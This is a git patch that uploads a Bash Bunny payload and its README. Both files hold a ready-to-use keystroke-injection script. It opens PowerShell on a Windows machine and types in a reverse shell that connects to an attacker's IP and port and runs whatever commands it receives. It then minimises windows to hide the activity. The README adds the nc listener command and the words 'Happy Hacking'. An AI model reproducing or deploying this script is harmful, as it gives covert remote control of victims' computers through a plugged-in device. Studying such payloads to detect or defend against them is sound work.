From c951bd10d1ff663c3e077b0328cbaf2d4928e6dd Mon Sep 17 00:00:00 2001
From: Dark Storme <131599936+LordDarkStorme@users.noreply.github.com>
Date: Tue, 16 Apr 2024 19:49:09 +0100
Subject: [PATCH] Add files via upload

---
 READEME.md  | 25 +++++++++++++++++++++++++
 payload.txt | 31 +++++++++++++++++++++++++++++++
 2 files changed, 56 insertions(+)
 create mode 100644 READEME.md
 create mode 100644 payload.txt

diff --git a/READEME.md b/READEME.md
new file mode 100644
index 00000000..bdeba3a6
--- /dev/null
+++ b/READEME.md
@@ -0,0 +1,25 @@
+A simple reverse shell for the Bash Bunny. I use it to connect to a Lightsail server. Just enter the IP and Port of the listener. Listener command nc -lnvp then port number. Put payload in switch folder.
+
+Heres the code. Happy Hacking.
+
+#TITLE. ReverseShellBunny #AUTHOR.DarkStorme #Reverse Shell for the Bash Bunny
+
+#!/bin/bash
+
+Set attack mode to HID
+ATTACKMODE HID
+
+LED attack indication
+LED ATTACK
+
+Open PowerShell
+QUACK GUI r QUACK DELAY 500 QUACK STRING powershell.exe QUACK DELAY 500 QUACK ENTER QUACK DELAY 2000
+
+Define the PowerShell payload
+PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'
+
+Send the PowerShell payload
+QUACK STRING "$PS_PAYLOAD" QUACK ENTER QUACK DELAY 5000 QUACK GUI d
+
+LED finish indication
+LED FINISH
\ No newline at end of file
diff --git a/payload.txt b/payload.txt
new file mode 100644
index 00000000..0894be8e
--- /dev/null
+++ b/payload.txt
@@ -0,0 +1,31 @@
+#TITLE. ReverseShellBunny
+#AUTHOR.DarkStorme
+#Reverse Shell for the Bash Bunny
+
+#!/bin/bash
+
+# Set attack mode to HID
+ATTACKMODE HID
+
+# LED attack indication
+LED ATTACK
+
+# Open PowerShell
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell.exe
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 2000
+
+# Define the PowerShell payload
+PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'
+
+# Send the PowerShell payload
+QUACK STRING "$PS_PAYLOAD"
+QUACK ENTER
+QUACK DELAY 5000
+QUACK GUI d
+
+# LED finish indication
+LED FINISH
\ No newline at end of file